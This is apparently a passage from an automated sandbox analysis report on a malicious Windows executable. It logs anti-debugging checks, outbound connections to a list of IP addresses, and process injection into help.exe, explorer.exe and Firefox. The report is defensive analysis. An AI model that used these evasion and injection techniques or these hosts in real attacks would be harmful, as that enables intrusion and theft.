      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81AE40 mov eax, dword ptr fs:[00000030h]11_2_1D81AE40
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81AE40 mov eax, dword ptr fs:[00000030h]11_2_1D81AE40
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81DE45 mov eax, dword ptr fs:[00000030h]11_2_1D81DE45
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81DE45 mov ecx, dword ptr fs:[00000030h]11_2_1D81DE45
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84EE48 mov eax, dword ptr fs:[00000030h]11_2_1D84EE48
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89DE50 mov eax, dword ptr fs:[00000030h]11_2_1D89DE50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89DE50 mov eax, dword ptr fs:[00000030h]11_2_1D89DE50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89DE50 mov ecx, dword ptr fs:[00000030h]11_2_1D89DE50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89DE50 mov eax, dword ptr fs:[00000030h]11_2_1D89DE50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89DE50 mov eax, dword ptr fs:[00000030h]11_2_1D89DE50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D mov eax, dword ptr fs:[00000030h]11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81BE60 mov eax, dword ptr fs:[00000030h]11_2_1D81BE60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81BE60 mov eax, dword ptr fs:[00000030h]11_2_1D81BE60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F4E62 mov eax, dword ptr fs:[00000030h]11_2_1D8F4E62
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D821E70 mov eax, dword ptr fs:[00000030h]11_2_1D821E70
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D857E71 mov eax, dword ptr fs:[00000030h]11_2_1D857E71
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DEE78 mov eax, dword ptr fs:[00000030h]11_2_1D8DEE78
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85CE70 mov eax, dword ptr fs:[00000030h]11_2_1D85CE70
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85C98F mov eax, dword ptr fs:[00000030h]11_2_1D85C98F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85C98F mov eax, dword ptr fs:[00000030h]11_2_1D85C98F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85C98F mov eax, dword ptr fs:[00000030h]11_2_1D85C98F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8AF9AA mov eax, dword ptr fs:[00000030h]11_2_1D8AF9AA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8AF9AA mov eax, dword ptr fs:[00000030h]11_2_1D8AF9AA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A0 mov eax, dword ptr fs:[00000030h]11_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81B9B0 mov eax, dword ptr fs:[00000030h]11_2_1D81B9B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8589B0 mov edx, dword ptr fs:[00000030h]11_2_1D8589B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F29CF mov eax, dword ptr fs:[00000030h]11_2_1D8F29CF
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F29CF mov eax, dword ptr fs:[00000030h]11_2_1D8F29CF
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82B9C0 mov eax, dword ptr fs:[00000030h]11_2_1D82B9C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82B9C0 mov eax, dword ptr fs:[00000030h]11_2_1D82B9C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8289C0 mov eax, dword ptr fs:[00000030h]11_2_1D8289C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8289C0 mov eax, dword ptr fs:[00000030h]11_2_1D8289C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84D9CE mov eax, dword ptr fs:[00000030h]11_2_1D84D9CE
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DD9C6 mov eax, dword ptr fs:[00000030h]11_2_1D8DD9C6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8AD9C7 mov eax, dword ptr fs:[00000030h]11_2_1D8AD9C7
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8199F0 mov ecx, dword ptr fs:[00000030h]11_2_1D8199F0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8209F0 mov eax, dword ptr fs:[00000030h]11_2_1D8209F0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8549F0 mov eax, dword ptr fs:[00000030h]11_2_1D8549F0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8549F0 mov eax, dword ptr fs:[00000030h]11_2_1D8549F0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84B9FA mov eax, dword ptr fs:[00000030h]11_2_1D84B9FA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D876912 mov eax, dword ptr fs:[00000030h]11_2_1D876912
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D817917 mov eax, dword ptr fs:[00000030h]11_2_1D817917
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852919 mov eax, dword ptr fs:[00000030h]11_2_1D852919
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D852919 mov eax, dword ptr fs:[00000030h]11_2_1D852919
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E892E mov eax, dword ptr fs:[00000030h]11_2_1D8E892E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E892E mov eax, dword ptr fs:[00000030h]11_2_1D8E892E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F492D mov eax, dword ptr fs:[00000030h]11_2_1D8F492D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D855921 mov eax, dword ptr fs:[00000030h]11_2_1D855921
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D855921 mov ecx, dword ptr fs:[00000030h]11_2_1D855921
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D855921 mov eax, dword ptr fs:[00000030h]11_2_1D855921
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D855921 mov eax, dword ptr fs:[00000030h]11_2_1D855921
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89C920 mov ecx, dword ptr fs:[00000030h]11_2_1D89C920
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89C920 mov eax, dword ptr fs:[00000030h]11_2_1D89C920
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89C920 mov eax, dword ptr fs:[00000030h]11_2_1D89C920
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89C920 mov eax, dword ptr fs:[00000030h]11_2_1D89C920
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81B931 mov eax, dword ptr fs:[00000030h]11_2_1D81B931
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81B931 mov eax, dword ptr fs:[00000030h]11_2_1D81B931
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D849938 mov ecx, dword ptr fs:[00000030h]11_2_1D849938
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D87693A mov eax, dword ptr fs:[00000030h]11_2_1D87693A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D87693A mov eax, dword ptr fs:[00000030h]11_2_1D87693A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D87693A mov eax, dword ptr fs:[00000030h]11_2_1D87693A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85C944 mov eax, dword ptr fs:[00000030h]11_2_1D85C944
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84D940 mov eax, dword ptr fs:[00000030h]11_2_1D84D940
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84D940 mov eax, dword ptr fs:[00000030h]11_2_1D84D940
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8ED946 mov eax, dword ptr fs:[00000030h]11_2_1D8ED946
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84E94E mov eax, dword ptr fs:[00000030h]11_2_1D84E94E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DD947 mov eax, dword ptr fs:[00000030h]11_2_1D8DD947
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D844955 mov eax, dword ptr fs:[00000030h]11_2_1D844955
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D844955 mov eax, dword ptr fs:[00000030h]11_2_1D844955
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A395B mov eax, dword ptr fs:[00000030h]11_2_1D8A395B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A395B mov eax, dword ptr fs:[00000030h]11_2_1D8A395B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A395B mov eax, dword ptr fs:[00000030h]11_2_1D8A395B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82B950 mov eax, dword ptr fs:[00000030h]11_2_1D82B950
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82B950 mov ecx, dword ptr fs:[00000030h]11_2_1D82B950
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82B950 mov eax, dword ptr fs:[00000030h]11_2_1D82B950
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82B950 mov eax, dword ptr fs:[00000030h]11_2_1D82B950
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82B950 mov eax, dword ptr fs:[00000030h]11_2_1D82B950
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82B950 mov eax, dword ptr fs:[00000030h]11_2_1D82B950
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85C958 mov eax, dword ptr fs:[00000030h]11_2_1D85C958
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83096B mov eax, dword ptr fs:[00000030h]11_2_1D83096B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83096B mov eax, dword ptr fs:[00000030h]11_2_1D83096B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826970 mov eax, dword ptr fs:[00000030h]11_2_1D826970
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826970 mov eax, dword ptr fs:[00000030h]11_2_1D826970
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826970 mov eax, dword ptr fs:[00000030h]11_2_1D826970
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826970 mov eax, dword ptr fs:[00000030h]11_2_1D826970
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826970 mov eax, dword ptr fs:[00000030h]11_2_1D826970
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826970 mov eax, dword ptr fs:[00000030h]11_2_1D826970
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D826970 mov eax, dword ptr fs:[00000030h]11_2_1D826970
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C1889 mov eax, dword ptr fs:[00000030h]11_2_1D8C1889
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C1889 mov eax, dword ptr fs:[00000030h]11_2_1D8C1889
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C1889 mov eax, dword ptr fs:[00000030h]11_2_1D8C1889
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D847882 mov eax, dword ptr fs:[00000030h]11_2_1D847882
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D846882 mov eax, dword ptr fs:[00000030h]11_2_1D846882
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D846882 mov eax, dword ptr fs:[00000030h]11_2_1D846882
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D846882 mov eax, dword ptr fs:[00000030h]11_2_1D846882
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85188E mov eax, dword ptr fs:[00000030h]11_2_1D85188E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85188E mov eax, dword ptr fs:[00000030h]11_2_1D85188E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85B890 mov eax, dword ptr fs:[00000030h]11_2_1D85B890
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85B890 mov eax, dword ptr fs:[00000030h]11_2_1D85B890
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85B890 mov eax, dword ptr fs:[00000030h]11_2_1D85B890
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84D898 mov eax, dword ptr fs:[00000030h]11_2_1D84D898
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D8890 mov eax, dword ptr fs:[00000030h]11_2_1D8D8890
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D8890 mov eax, dword ptr fs:[00000030h]11_2_1D8D8890
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F8B0 mov eax, dword ptr fs:[00000030h]11_2_1D81F8B0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A98B2 mov eax, dword ptr fs:[00000030h]11_2_1D8A98B2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C0 mov eax, dword ptr fs:[00000030h]11_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8188C8 mov eax, dword ptr fs:[00000030h]11_2_1D8188C8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8188C8 mov eax, dword ptr fs:[00000030h]11_2_1D8188C8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8208CD mov eax, dword ptr fs:[00000030h]11_2_1D8208CD
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8208CD mov eax, dword ptr fs:[00000030h]11_2_1D8208CD
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E18DA mov eax, dword ptr fs:[00000030h]11_2_1D8E18DA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E18DA mov eax, dword ptr fs:[00000030h]11_2_1D8E18DA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E18DA mov eax, dword ptr fs:[00000030h]11_2_1D8E18DA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E18DA mov eax, dword ptr fs:[00000030h]11_2_1D8E18DA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8298DE mov eax, dword ptr fs:[00000030h]11_2_1D8298DE
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8178E1 mov eax, dword ptr fs:[00000030h]11_2_1D8178E1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8258E0 mov eax, dword ptr fs:[00000030h]11_2_1D8258E0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03341F72 LdrLoadDll,2_2_03341F72

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 154.204.24.45 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.185.32.157 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 194.245.148.189 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.39 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.232.217.125 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.190.63.111 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 103.91.8.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.151.40 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 38.55.15.214 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.130.41.24 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.101.158.239 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.212 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 50.87.192.144 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 103.63.2.175 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.58.118.167 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 195.24.68.23 80Jump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: E0000Jump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeSection loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\help.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6C7650000Jump to behavior
      Source: C:\Windows\SysWOW64\help.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6C7650000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeThread register set: target process: 7608Jump to behavior
      Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 4696Jump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess created: C:\Users\user\Desktop\Jjfmcz1Hsz.exe C:\Users\user\Desktop\Jjfmcz1Hsz.exeJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: RAVCpl64.exe, 00000012.00000000.1269474628.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000012.00000002.5816935645.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000012.00000000.1278671586.0000000000DC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: RAVCpl64.exe, 00000012.00000000.1269474628.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000012.00000002.5816935645.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000012.00000000.1278671586.0000000000DC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
